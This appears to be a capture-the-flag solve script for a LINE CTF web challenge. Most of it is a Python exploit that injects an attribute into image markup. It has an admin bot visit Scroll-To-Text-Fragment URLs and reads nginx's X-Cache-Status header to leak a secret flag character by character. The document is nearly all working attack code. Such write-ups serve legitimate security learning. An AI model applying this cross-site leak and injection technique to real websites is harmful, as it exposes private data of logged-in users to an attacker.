Using STTF and nginx cache header, we can leak the admin's flag.
#!/usr/bin/env python3
import requests
import random
import time
target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
def uploadImage(payload):
z = 'A'*10000+str(random.random())+' IMHERE '
r = s.post(f'{target}/image',data={'title':z,'img_url':f'/static/image/68fa5809a96e4870989609a6676826ba.jpg?a={payload} loading=lazy','img_file':rfile}).text
r = r.split("\n")
for q in r:
if(z in q):
q = q[q.index('<a href="')+10:q.index(z)-2]
return q
s = requests.session()
s.post(f'{target}/login',data={'username':'adsfadfadfhsdjf','password':'adsfadfadfhsdjf'})
# http://35.187.204.223/image/26233421-c4b1-4b4b-a43b-fe3770c5c071
flag = 'LINECTF{0/5/d/'
while 1:
for cccc in "0123456789abcdef":
key = str(random.random())[-8:]
g = uploadImage('lmao'+key)
payloadlol = g+'#:~:text='+flag+cccc
r = s.post(f'{target}/share',json={'path':payloadlol}).json()
assert(r['result'] == 'ok')
time.sleep(5)
if(requests.get(f'{target}/static/image/68fa5809a96e4870989609a6676826ba.jpg?a=lmao{key}').headers['X-Cache-Status'] == 'HIT'):
flag += cccc+'/'
print(flag)
break
else:
print(cccc)